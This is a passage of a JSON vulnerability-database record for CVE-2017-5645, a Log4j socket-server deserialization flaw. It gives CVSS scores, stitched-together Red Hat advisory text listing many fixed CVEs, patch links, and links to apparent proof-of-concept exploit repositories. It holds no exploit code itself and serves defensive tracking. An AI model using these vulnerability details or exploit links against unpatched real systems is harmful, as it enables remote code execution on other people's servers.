"id": "JVNDB-2017-003152"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "163798"
},
{
"db": "PACKETSTORM",
"id": "144347"
},
{
"db": "PACKETSTORM",
"id": "144358"
},
{
"db": "PACKETSTORM",
"id": "153344"
},
{
"db": "PACKETSTORM",
"id": "144360"
},
{
"db": "PACKETSTORM",
"id": "144013"
},
{
"db": "PACKETSTORM",
"id": "142856"
},
{
"db": "PACKETSTORM",
"id": "144018"
}
],
"trust": 0.8
},
"cve": "CVE-2017-5645",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2017-5645",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-113848",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2017-5645",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-5645",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-5645",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2017-5645",
"trust": 0.8,
"value": "Critical"
},
{
"author": "VULHUB",
"id": "VHN-113848",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-5645",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113848"
},
{
"db": "VULMON",
"id": "CVE-2017-5645"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
},
{
"db": "NVD",
"id": "CVE-2017-5645"
}
]
},
"description": {
"_id": null,
"data": "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j Contains a vulnerability in the deserialization of unreliable data.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. A code issue vulnerability exists in Apache Log4j 2.x versions prior to 2.8.2. An attacker could exploit this vulnerability to execute arbitrary code. \n\nSecurity Fix(es):\n\n* hawtio-osgi (CVE-2017-5645)\n\n* prometheus-jmx-exporter: snakeyaml (CVE-2017-18640)\n\n* apache-commons-compress (CVE-2019-12402)\n\n* karaf-transaction-manager-narayana: netty (CVE-2019-16869,\nCVE-2019-20445)\n\n* tomcat (CVE-2020-1935, CVE-2020-1938, CVE-2020-9484, CVE-2020-13934,\nCVE-2020-13935, CVE-2020-11996)\n\n* spring-cloud-config-server (CVE-2020-5410)\n\n* velocity (CVE-2020-13936)\n\n* httpclient: apache-httpclient (CVE-2020-13956)\n\n* shiro-core: shiro (CVE-2020-17510)\n\n* hibernate-core (CVE-2020-25638)\n\n* wildfly-openssl (CVE-2020-25644)\n\n* jetty (CVE-2020-27216, CVE-2021-28165)\n\n* bouncycastle (CVE-2020-28052)\n\n* wildfly (CVE-2019-14887, CVE-2020-25640)\n\n* resteasy-jaxrs: resteasy (CVE-2020-1695)\n\n* camel-olingo4 (CVE-2020-1925)\n\n* springframework (CVE-2020-5421)\n\n* jsf-impl: Mojarra (CVE-2020-6950)\n\n* resteasy (CVE-2020-10688)\n\n* hibernate-validator (CVE-2020-10693)\n\n* wildfly-elytron (CVE-2020-10714)\n\n* undertow (CVE-2020-10719)\n\n* activemq (CVE-2020-13920)\n\n* cxf-core: cxf (CVE-2020-13954)\n\n* fuse-apicurito-operator-container: golang.org/x/text (CVE-2020-14040)\n\n* jboss-ejb-client: wildfly (CVE-2020-14297)\n\n* xercesimpl: wildfly (CVE-2020-14338)\n\n* xnio (CVE-2020-14340)\n\n* flink: apache-flink (CVE-2020-17518)\n\n* resteasy-client (CVE-2020-25633)\n\n* xstream (CVE-2020-26258)\n\n* mybatis (CVE-2020-26945)\n\n* pdfbox (CVE-2021-27807, CVE-2021-27906)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1758619 - CVE-2019-16869 netty: HTTP request smuggling by mishandled whitespace before the colon in HTTP headers\n1764640 - CVE-2019-12402 apache-commons-compress: Infinite loop in name encoding algorithm\n1772008 - CVE-2019-14887 wildfly: The \u0027enabled-protocols\u0027 value in legacy security is not respected if OpenSSL security provider is in use\n1785376 - CVE-2017-18640 snakeyaml: Billion laughs attack via alias feature\n1790309 - CVE-2020-1925 olingo-odata: Server side request forgery in AsyncResponseWrapperImpl\n1798509 - CVE-2019-20445 netty: HttpObjectDecoder.java allows Content-Length header to accompanied by second Content-Length header\n1805006 - CVE-2020-6950 Mojarra: Path traversal via either the loc parameter or the con parameter, incomplete fix of CVE-2018-14371\n1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages\n1806398 - CVE-2020-1938 tomcat: Apache Tomcat AJP File Read/Inclusion Vulnerability\n1806835 - CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling\n1814974 - CVE-2020-10688 RESTEasy: RESTEASY003870 exception in RESTEasy can lead to a reflected XSS attack\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1828459 - CVE-2020-10719 undertow: invalid HTTP request with large chunk size\n1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE\n1845626 - CVE-2020-5410 spring-cloud-config-server: sending a request using a specially crafted URL can lead to a directory traversal attack\n1851420 - CVE-2020-11996 tomcat: specially crafted sequence of HTTP/2 requests can lead to DoS\n1853595 - CVE-2020-14297 wildfly: Some EJB transaction objects may get accumulated causing Denial of Service\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1857024 - CVE-2020-13935 tomcat: multiple requests with invalid payload length in a WebSocket frame could lead to DoS\n1857040 - CVE-2020-13934 tomcat: OutOfMemoryException caused by HTTP/2 connection leak could lead to DoS\n1860054 - CVE-2020-14338 wildfly: XML validation manipulation due to incomplete application of use-grammar-pool-only in xercesImpl\n1860218 - CVE-2020-14340 xnio: file descriptor leak caused by growing amounts of NIO Selector file handles may lead to DoS\n1879042 - CVE-2020-25633 resteasy-client: potential sensitive information leakage in JAX-RS RESTEasy Client\u0027s WebApplicationException handling\n1880101 - CVE-2020-13920 activemq: improper authentication allows MITM attack\n1881158 - CVE-2020-5421 springframework: RFD protection bypass via jsessionid\n1881353 - CVE-2020-25638 hibernate-core: SQL injection vulnerability when both hibernate.use_sql_comments and JPQL String literals are used\n1881637 - CVE-2020-25640 wildfly: resource adapter logs plaintext JMS password at warning level on connection error\n1885485 - CVE-2020-25644 wildfly-openssl: memory leak per HTTP session creation in WildFly OpenSSL\n1886587 - CVE-2020-13956 apache-httpclient: incorrect handling of malformed authority component in request URIs\n1887257 - CVE-2020-26945 mybatis: mishandles deserialization of object streams which could result in remote code execution\n1891132 - CVE-2020-27216 jetty: local temporary directory hijacking vulnerability\n1898235 - CVE-2020-13954 cxf: XSS via the styleSheetPath\n1903727 - CVE-2020-17510 shiro: specially crafted HTTP request may cause an authentication bypass\n1908832 - CVE-2020-26258 XStream: Server-Side Forgery Request vulnerability can be activated when unmarshalling\n1912881 - CVE-2020-28052 bouncycastle: password bypass in OpenBSDBCrypt.checkPassword utility possible\n1913312 - CVE-2020-17518 apache-flink: directory traversal attack allows remote file writing through the REST API\n1937440 - CVE-2020-13936 velocity: arbitrary code execution when attacker is able to modify templates\n1941050 - CVE-2021-27906 pdfbox: OutOfMemory-Exception while loading a crafted PDF file\n1941055 - CVE-2021-27807 pdfbox: infinite loop while loading a crafted PDF file\n1945714 - CVE-2021-28165 jetty: Resource exhaustion when receiving an invalid large TLS frame\n\n5. \n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). \n\nThis release of Red Hat JBoss Enterprise Application Platform 7.0.8 serves\nas a replacement for Red Hat JBoss Enterprise Application Platform 7.0.7,\nand includes bug fixes and enhancements, which are documented in the\nRelease Notes document linked to in the References. (CVE-2017-5645)\n\n* A vulnerability was found in Jasypt that would allow an attacker to\nperform a timing attack on password hash comparison. (CVE-2014-9970)\n\n* It was found that an information disclosure flaw in Bouncy Castle could\nenable a local malicious application to gain access to user\u0027s private\ninformation. (CVE-2015-6644)\n\n* It was found that while parsing the SAML messages the StaxParserUtil\nclass of Picketlink replaces special strings for obtaining attribute values\nwith system property. This could allow an attacker to determine values of\nsystem properties at the attacked system by formatting the SAML request ID\nfield to be the chosen system property which could be obtained in the\n\"InResponseTo\" field in the response. (CVE-2017-2582)\n\n* It was found that when the security manager\u0027s reflective permissions,\nwhich allows it to access the private members of the class, are granted to\nHibernate Validator, a potential privilege escalation can occur. By\nallowing the calling code to access those private members without the\npermission an attacker may be able to validate an invalid instance and\naccess the private member value via ConstraintViolation#getInvalidValue(). Solution:\n\nBefore applying this update, back up your existing Red Hat JBoss Enterprise\nApplication Platform installation and deployed applications. Bugs fixed (https://bugzilla.redhat.com/):\n\n1410481 - CVE-2017-2582 picketlink, keycloak: SAML request parser replaces special strings with system properties\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1444015 - CVE-2015-6644 bouncycastle: Information disclosure in GCMBlockCipher\n1455566 - CVE-2014-9970 jasypt: Vulnerable to timing attack against the password hash comparison\n1465573 - CVE-2017-7536 hibernate-validator: Privilege escalation when running under the security manager\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-11485 - Tracker bug for the EAP 7.0.8 release for RHEL-7\n\n7. \n\nSecurity Fix(es):\n\n* bsh2: remote code execution via deserialization (CVE-2016-2510)\n\n* log4j: Socket receiver deserialization vulnerability (CVE-2017-5645)\n\n* uima: XML external entity expansion (XXE) can allow attackers to execute\narbitrary code (CVE-2017-15691)\n\n* mysql-connector-java: Connector/J unspecified vulnerability (CPU October\n2018) (CVE-2018-3258)\n\n* thrift: Improper Access Control grants access to files outside the\nwebservers docroot path (CVE-2018-11798)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section. \n\nInstallation instructions are available from the Fuse 7.3.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1310647 - CVE-2016-2510 bsh2: remote code execution via deserialization\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n1572463 - CVE-2017-15691 uima: XML external entity expansion (XXE) can allow attackers to execute arbitrary code\n1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)\n1667188 - CVE-2018-11798 thrift: Improper Access Control grants access to files outside the webservers docroot path\n\n5. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rh-java-common-log4j security update\nAdvisory ID: RHSA-2017:1417-01\nProduct: Red Hat Software Collections\nAdvisory URL: https://access.redhat.com/errata/RHSA-2017:1417\nIssue date: 2017-06-08\nCVE Names: CVE-2017-5645 \n=====================================================================\n\n1. Summary:\n\nAn update for rh-java-common-log4j is now available for Red Hat Software\nCollections. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch\n\n3. Description:\n\nLog4j is a tool to help the programmer output log statements to a variety\nof output targets. (CVE-2017-5645)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability\n\n6. Package List:\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):\n\nSource:\nrh-java-common-log4j-1.2.17-15.15.el6.src.rpm\n\nnoarch:\nrh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm\nrh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm\nrh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):\n\nSource:\nrh-java-common-log4j-1.2.17-15.15.el6.src.rpm\n\nnoarch:\nrh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm\nrh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm\nrh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nrh-java-common-log4j-1.2.17-15.15.el6.src.rpm\n\nnoarch:\nrh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm\nrh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm\nrh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):\n\nSource:\nrh-java-common-log4j-1.2.17-15.15.el7.src.rpm\n\nnoarch:\nrh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm\nrh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm\nrh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3):\n\nSource:\nrh-java-common-log4j-1.2.17-15.15.el7.src.rpm\n\nnoarch:\nrh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm\nrh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm\nrh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm\n\nRed Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nrh-java-common-log4j-1.2.17-15.15.el7.src.rpm\n\nnoarch:\nrh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm\nrh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm\nrh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2017-5645\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2017 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFZOQMQXlSAg2UNWIIRAgwvAJ9zqVY6yvhkuO8Uqdtyu86+9P1VIgCgtBhf\nceYEsokMPo3LCY/99DiysrI=\n=wZ5c\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2017-5645)\n\n* A vulnerability was discovered in the error page mechanism in Tomcat\u0027s\nDefaultServlet implementation. A crafted HTTP request could cause undesired\nside effects, possibly including the removal or replacement of the custom\nerror page. \n(CVE-2017-7525)\n\nRed Hat would like to thank Liao Xinxi (NSFOCUS) for reporting\nCVE-2017-7525",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5645"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
},
{
"db": "VULHUB",
"id": "VHN-113848"
},
{
"db": "VULMON",
"id": "CVE-2017-5645"
},
{
"db": "PACKETSTORM",
"id": "163798"
},
{
"db": "PACKETSTORM",
"id": "144347"
},
{
"db": "PACKETSTORM",
"id": "144358"
},
{
"db": "PACKETSTORM",
"id": "153344"
},
{
"db": "PACKETSTORM",
"id": "144360"
},
{
"db": "PACKETSTORM",
"id": "144013"
},
{
"db": "PACKETSTORM",
"id": "142856"
},
{
"db": "PACKETSTORM",
"id": "144018"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2017-5645",
"trust": 2.8
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2019/12/19/2",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1041294",
"trust": 1.1
},
{
"db": "SECTRACK",
"id": "1040200",
"trust": 1.1
},
{
"db": "BID",
"id": "97702",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "144018",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "144013",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "142856",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "145263",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143500",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144014",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144017",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143670",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144597",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144596",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "143499",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144019",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "145262",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-201704-852",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-92965",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-113848",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2017-5645",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163798",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144347",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144358",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "153344",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "144360",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113848"
},
{
"db": "VULMON",
"id": "CVE-2017-5645"
},
{
"db": "PACKETSTORM",
"id": "163798"
},
{
"db": "PACKETSTORM",
"id": "144347"
},
{
"db": "PACKETSTORM",
"id": "144358"
},
{
"db": "PACKETSTORM",
"id": "153344"
},
{
"db": "PACKETSTORM",
"id": "144360"
},
{
"db": "PACKETSTORM",
"id": "144013"
},
{
"db": "PACKETSTORM",
"id": "142856"
},
{
"db": "PACKETSTORM",
"id": "144018"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
},
{
"db": "NVD",
"id": "CVE-2017-5645"
}
]
},
"id": "VAR-201704-1589",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-113848"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:56:50.077000Z",
"patch": {
"_id": null,
"data": [
{
"title": "LOG4J2-1863",
"trust": 0.8,
"url": "https://issues.apache.org/jira/browse/LOG4J2-1863"
},
{
"title": "Red Hat: Important: Red Hat JBoss BRMS 6.4.6 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20172888 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss BPM Suite 6.4.6 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20172889 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 5.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20173400 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 5.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20173399 - Security Advisory"
},
{
"title": "Red Hat: Important: rh-java-common-log4j security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171417 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Data Grid 7.1.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20173244 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: apache-log4j2: CVE-2017-5645: socket receiver deserialization vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=3fdfc30e441b98eacc4cae3c3c8416ea"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20172810 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server Service Pack 1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171802 - Security Advisory"
},
{
"title": "Red Hat: Important: eap7-jboss-ec2-eap security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20172811 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20172808 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.3.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20191545 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20172809 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Web Server 3.1.0 Service Pack 1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20171801 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: apache-log4j1.2: CVE-2019-17571",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=9b1a2b3bcff03a4370bb153cc1e9d89e"
},
{
"title": "Red Hat: CVE-2017-5645",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2017-5645"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1562",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1562"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - July 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=5f8c525f1408011628af1792207b2099"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2019",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=f655264a6935505d167bbf45f409a57b"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - April 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=4019ca77f50c7a34e4d97833e6f3321e"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - October 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=81c63752a6f26433af2128b2e8c02385"
},
{
"title": "Oracle Linux Bulletins: Oracle Linux Bulletin - July 2017",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=549dc795290b298746065b62b4bb7928"
},
{
"title": "Oracle: Oracle Critical Patch Update Advisory - January 2018",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=e2a7f287e9acc8c64ab3df71130bc64d"
},
{
"title": "Log4J-RCE-Implementation",
"trust": 0.1,
"url": "https://github.com/Marcelektro/Log4J-RCE-Implementation "
},
{
"title": "CVE-2017-5645",
"trust": 0.1,
"url": "https://github.com/pimps/CVE-2017-5645 "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/spmonkey/spassassin "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-5645"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-113848"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-003152"
},
{
"db": "NVD",
"id": "CVE-2017-5645"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5645"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2017:1417"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2017:2633"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2017:2637"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2017:2808"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2017:2809"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2017:2810"
},
{
"trust": 1.2,
"url": "https://access.redhat.com/errata/rhsa-2019:1545"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/bid/97702"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
},
{
"trust": 1.1,
"url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html"
},
{
"trust": 1.1,
"url": "https://issues.apache.org/jira/browse/log4j2-1863"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20180726-0002/"
},
{
"trust": 1.1,
"url": "https://security.netapp.com/advisory/ntap-20181107-0002/"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
},
{
"trust": 1.1,
"url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html"
},
{
"trust": 1.1,
